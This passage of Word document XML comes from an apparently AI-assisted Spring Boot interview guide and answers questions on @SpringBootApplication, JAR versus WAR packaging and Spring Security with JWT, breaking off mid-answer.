          <w:p w14:paraId="4330E492" w14:textId="77777777" w:rsidR="00F202E9" w:rsidRPr="002C6305" w:rsidRDefault="00F202E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No Boilerplate Code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="45BD7B19" w14:textId="77777777" w:rsidR="00F202E9" w:rsidRPr="002C6305" w:rsidRDefault="00F202E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duces the need to write boilerplate DAO implementations</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5067A566" w14:textId="77777777" w:rsidR="00F202E9"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29ADD6D">
          <v:rect id="_x0000_i2627" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="33411877" w14:textId="77777777" w:rsidR="00F202E9" w:rsidRPr="002C6305" w:rsidRDefault="00F202E9"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Common Superinterfaces:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635461F9" w14:textId="77777777" w:rsidR="00F202E9" w:rsidRPr="002C6305" w:rsidRDefault="00F202E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rudRepository&lt;T, ID&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373F7802" w14:textId="77777777" w:rsidR="00F202E9" w:rsidRPr="002C6305" w:rsidRDefault="00F202E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agingAndSortingRepository&lt;T, ID&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18EBA372" w14:textId="77777777" w:rsidR="00F202E9" w:rsidRPr="002C6305" w:rsidRDefault="00F202E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JpaRepository&lt;T, ID&gt; — most commonly used</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EA012A" w14:textId="77777777" w:rsidR="00F202E9" w:rsidRPr="002C6305" w:rsidRDefault="00F202E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et me know if you want a sample controller or service class using this.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552A4C32" w14:textId="3B6E3DFF"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69ACB18">
          <v:rect id="_x0000_i2628" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="66FB0EC8" w14:textId="13B7FB02" w:rsidR="007D2E6B" w:rsidRPr="00CE4B95" w:rsidRDefault="00827C49">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="625" w:name="_Toc196308105"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the use of @SpringBootApplication annotation in Spring boot</w:t>
      </w:r>
      <w:r w:rsidR="007D2E6B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="625"/>
    </w:p>
    <w:p w14:paraId="025FE5B7" w14:textId="367143B7" w:rsidR="006F4985" w:rsidRPr="002C6305" w:rsidRDefault="006F4985"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The @SpringBootApplication annotation is a </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>convenience annotation</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Spring Boot that combines three key annotations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FC5B26"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arget(ElementType.TYPE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73418716"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tention(RetentionPolicy.RUNTIME)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E8565F"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BootConfiguration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73464C41"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ableAutoConfiguration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE86055"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mponentScan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC48D7E"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interface SpringBootApplication {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62751B46"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1A43A0D" w14:textId="77777777" w:rsidR="006F498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14D46F5">
          <v:rect id="_x0000_i2629" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5453D498" w14:textId="77777777" w:rsidR="006F4985" w:rsidRPr="002C6305" w:rsidRDefault="006F498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Combines:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0FBD30"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ringBootConfiguration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D9987B" w14:textId="77777777" w:rsidR="006F4985" w:rsidRPr="002C6305" w:rsidRDefault="006F4985"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 specialization of @Configuration, marks the class as a source of bean definitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBB6971"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nableAutoConfiguration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC90E2F" w14:textId="77777777" w:rsidR="006F4985" w:rsidRPr="002C6305" w:rsidRDefault="006F4985"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ables Spring Boot’s auto-configuration mechanism that automatically configures beans based on dependencies on the classpath.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F31FDE9"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omponentScan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE6AF81" w14:textId="77777777" w:rsidR="006F4985" w:rsidRPr="002C6305" w:rsidRDefault="006F4985"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utomatically scans and registers beans/components in the same package or sub-packages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE7DC3A" w14:textId="77777777" w:rsidR="006F498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CA8128D">
          <v:rect id="_x0000_i2630" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F87A5B" w14:textId="77777777" w:rsidR="006F4985" w:rsidRPr="002C6305" w:rsidRDefault="006F498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Benefits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7AD45F"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liminates the need to declare each annotation separately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4631F5C9"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duces boilerplate in Spring Boot applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05AEFF7B"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ables you to start the Spring context with minimal configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258BD4E5" w14:textId="77777777" w:rsidR="006F498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6DC7420">
          <v:rect id="_x0000_i2631" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="00732C6A" w14:textId="77777777" w:rsidR="006F4985" w:rsidRPr="002C6305" w:rsidRDefault="006F498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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7B7C1A"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BootApplication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6554E7FB"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MyApplication {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05547B21"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atic void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15044688"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pringApplication.run(MyApplication.class, args);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601282F5"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4136C9A5"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DE29435"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This single annotation sets up component scanning, configuration, and auto-configuration for a Spring Boot app.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A52416B" w14:textId="066D81A8"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5FA8281">
          <v:rect id="_x0000_i2632" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB52CB5" w14:textId="2D754056" w:rsidR="007D2E6B" w:rsidRPr="00CE4B95" w:rsidRDefault="00827C49">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="626" w:name="_Toc196308106"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How will the Spring boot application know whether its JAR or WAR type</w:t>
      </w:r>
      <w:r w:rsidR="007D2E6B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="626"/>
    </w:p>
    <w:p w14:paraId="51E065D9" w14:textId="780BC116" w:rsidR="006F4985" w:rsidRPr="002C6305" w:rsidRDefault="006F4985"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Spring Boot determines whether the application is packaged as a </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JAR</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WAR</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> based on how it's configured in your </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>build tool</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (like Maven or Gradle) and the presence of specific classes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B021E1" w14:textId="77777777" w:rsidR="006F498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444935">
          <v:rect id="_x0000_i2633" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="08108BBC" w14:textId="77777777" w:rsidR="006F4985" w:rsidRPr="002C6305" w:rsidRDefault="006F498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1. Packaging in pom.xml or build.gradle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCD5A59" w14:textId="77777777" w:rsidR="006F4985" w:rsidRPr="002C6305" w:rsidRDefault="006F498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For Maven:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A100B3B"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packaging&gt;jar&lt;/packaging&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648BBCDC"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or</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD92960"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packaging&gt;war&lt;/packaging&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29151F78" w14:textId="77777777" w:rsidR="006F4985" w:rsidRPr="002C6305" w:rsidRDefault="006F498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For Gradle:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A64FF09"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lugins {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F98B7D5"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id 'org.springframework.boot' version '3.x.x'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D17618"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id 'java'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EAC392F"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Use 'war' plugin if it's a WAR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501A77F8"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id 'war' </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22795244"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2355C722" w14:textId="77777777" w:rsidR="006F498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CB96D9E">
          <v:rect id="_x0000_i2634" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC52152" w14:textId="77777777" w:rsidR="006F4985" w:rsidRPr="002C6305" w:rsidRDefault="006F498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2. Main Class Differences</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219C0296"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For </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JAR</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You run it with an embedded server (Tomcat, Jetty, etc.) using SpringApplication.run(...).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791BE604"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For </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>WAR</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You exclude the embedded server and extend SpringBootServletInitializer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E542A21"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BootApplication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE10570"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MyApplication extends SpringBootServletInitializer {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9A5E2B"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verride</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491B9893"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otected SpringApplicationBuilder configure(SpringApplicationBuilder builder) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B90A1B"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builder.sources(MyApplication.class);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC58B52"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687E96A3" w14:textId="77777777" w:rsidR="006F4985" w:rsidRPr="002C6305" w:rsidRDefault="006F4985" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B65E0DA"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atic void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6FEBC6"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pringApplication.run(MyApplication.class, args);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B5104D"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7B3F4019"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48AEF06" w14:textId="77777777" w:rsidR="006F498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0AF0784">
          <v:rect id="_x0000_i2635" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2100A168" w14:textId="77777777" w:rsidR="006F4985" w:rsidRPr="002C6305" w:rsidRDefault="006F498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3. Dependencies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303CDFA9"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JAR</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: spring-boot-starter-web includes embedded Tomcat.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5D17CF"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WAR</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: You typically </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>exclude embedded Tomcat</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506729A1"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20B4DFA1"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org.springframework.boot&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F3EAAB"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spring-boot-starter-tomcat&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097E9165"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scope&gt;provided&lt;/scope&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579C790D"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28DCCBC1" w14:textId="77777777" w:rsidR="006F498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5C00083">
          <v:rect id="_x0000_i2636" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="39817166" w14:textId="77777777" w:rsidR="006F4985" w:rsidRPr="002C6305" w:rsidRDefault="006F498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Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E81811"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Spring Boot doesn’t automatically detect JAR vs WAR; it follows </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>your packaging type</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>startup class configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588C1DB7" w14:textId="711D49B8"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8AF1DF5">
          <v:rect id="_x0000_i2637" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="13785DA9" w14:textId="0430245E" w:rsidR="007D2E6B" w:rsidRPr="00CE4B95" w:rsidRDefault="00827C49">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="627" w:name="_Toc196308107"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How are you providing security to your services</w:t>
      </w:r>
      <w:r w:rsidR="007D2E6B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="627"/>
    </w:p>
    <w:p w14:paraId="15EFF4D2" w14:textId="351C15E3" w:rsidR="006F4985" w:rsidRPr="002C6305" w:rsidRDefault="006F4985"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 Spring Boot applications, </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>security</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is typically provided using </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Security</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> along with optional features like </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JWT</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OAuth2</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, and HTTPS. Here's how security is implemented:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318FD65C" w14:textId="77777777" w:rsidR="006F498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A2259FC">
          <v:rect id="_x0000_i2638" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="761F587E" w14:textId="77777777" w:rsidR="006F4985" w:rsidRPr="002C6305" w:rsidRDefault="006F498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1. Spring Security Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B92C825"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e create a security configuration class that extends WebSecurityConfigurerAdapter (Spring Boot 2.x) or uses the new SecurityFilterChain bean (Spring Boot 3.x).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3914FC59"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Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7521B20E"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ableWebSecurity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B8A71E"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SecurityConfig {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EEFF041" w14:textId="77777777" w:rsidR="006F4985" w:rsidRPr="002C6305" w:rsidRDefault="006F4985" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65E0DCF4"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ean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8979B1"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ecurityFilterChain filterChain(HttpSecurity http) throws Exception {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0E8192"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http.csrf().disable()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768DAB0F"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horizeHttpRequests()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E84361"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questMatchers("/api/public/**").permitAll()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706DAD7D"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yRequest().authenticated()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA578AA"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d()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7912ED18"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httpBasic(); // or .formLogin(), or .oauth2Login()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661E9BAA"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http.build();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F46C2F7"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18B26163"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0E4EDCC6" w14:textId="77777777" w:rsidR="006F498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2E2F42E">
          <v:rect id="_x0000_i2639" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="02784830" w14:textId="77777777" w:rsidR="006F4985" w:rsidRPr="002C6305" w:rsidRDefault="006F498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2. JWT Token-Based Authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B760C03"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e use JWT tokens to avoid storing sessions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB7C03C"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On login, generate a JWT token.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565692EA"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nd the token in the Authorization header for each request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524F0209"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Validate the token in a filter before processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0DE3BE" w14:textId="77777777" w:rsidR="006F498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BE8E89">
          <v:rect id="_x0000_i2640" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE6CD02" w14:textId="77777777" w:rsidR="006F4985" w:rsidRPr="002C6305" w:rsidRDefault="006F4985" w:rsidP="002C6305">
      <w:pPr>
